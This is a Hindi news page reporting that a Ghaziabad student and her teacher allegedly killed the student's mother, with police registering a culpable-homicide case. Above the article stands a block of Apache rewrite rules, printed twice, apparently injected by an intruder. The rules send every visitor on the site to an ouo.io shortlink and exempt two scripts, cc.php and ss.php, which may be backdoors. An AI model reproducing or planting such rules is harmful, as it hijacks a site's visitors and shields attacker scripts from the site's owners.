
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 573
Previous Nextनई दिल्ली। गाजियाबाद के कविनगर में रहने वाली 18 वर्षीय छात्रा ने अपनी टीचर के साथ मिलकर अपनी ही मां को मौत के घाट उतार दिया। छात्रा के पिता ने पुलिस में मामला दर्ज करवाया है। घटना के बाद से आरोपी छात्रा और उसकी महिला अध्यापिका फरार है।
जानकारी के मुताबिक शिकायतकर्ता सतीश ने पुलिस के सामने आरोप लगाया है कि उनकी बेटी रश्मि को स्कूल टीचर निशा गौतम ने अपने वश कर लिया था। रश्मि को उनसे इतना लगाव हो गया था कि वह उसी के साथ रहने लगी थी। उन्होंने बताया कि 9 मार्च को दोनों घर पर ही थी तभी रश्मि की अपनी पुष्पा के साथ किसी बात पर बहस हो गई। इसके बाद रश्मि ने किसी भारी सामान से हमला कर दिया जिससे पुष्पा बुरी तरह घायल हो गई। घटना के समय वह और उनकी छोटी बेटी घर से बाहर गए थे। जब छोटी बेटी वापस लौटी तो रश्मि और निशा गौतम घर से बाहर निकल रही थीं लेकिन जब उसने घर के अंदर देखा तो मां खून से लथपथ पड़ी हुई थीं। छोटी बेटी की सूचना पर सतीश ने घर पहुंच कर पुष्पा को दिल्ली के अस्पताल में भर्ती करवाया लेकिन इलाज के दौरान उनकी मौत हो गई। फिलहाल इस मामले में पुलिस ने गैर-इरादतन हत्या का मामला दर्ज कर लिया है।